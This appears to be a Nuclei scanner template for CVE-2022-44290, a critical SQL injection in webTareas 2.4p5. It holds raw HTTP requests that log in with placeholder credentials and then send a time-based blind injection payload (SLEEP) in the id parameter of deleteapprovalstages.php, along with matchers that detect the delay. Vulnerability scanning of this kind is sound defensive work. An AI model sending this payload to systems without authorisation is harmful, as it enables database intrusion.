id: CVE-2022-44290 info: name: WebTareas 2.4p5 - SQL Injection author: theamanrawat severity: critical description: | webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in deleteapprovalstages.php. reference: - http://webtareas.com/ - https://github.com/anhdq201/webtareas/issues/2 - https://nvd.nist.gov/vuln/detail/CVE-2022-44290 - http://webtareas.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-44290 cwe-id: CWE-89 epss-score: 0.00789 epss-percentile: 0.79495 cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: webtareas_project product: webtareas tags: cve,cve2022,sqli,webtareas,authenticated,intrusive http: - raw: - | POST /general/login.php?session=false HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525 -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="action" login -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="loginForm" {{username}} -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="passwordForm" {{password}} -----------------------------3023071625140724693672385525 Content-Disposition: form-data; name="loginSubmit" Log In -----------------------------3023071625140724693672385525-- - | @timeout: 20s GET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers: - type: dsl dsl: - duration>=6 - status_code == 200 - contains(header, "text/html") - contains(body, 'Delete the following?') condition: and # digest: 490a0046304402204200ac944567253879fc09a691f2daa3777a6de58886fd65d23edcf915e27e9002205399d850653aeaf77fd812c82e08d0883e4036236ba9891c2460a350f34dbcc4:922c64590222798bb761d5b6d8e72950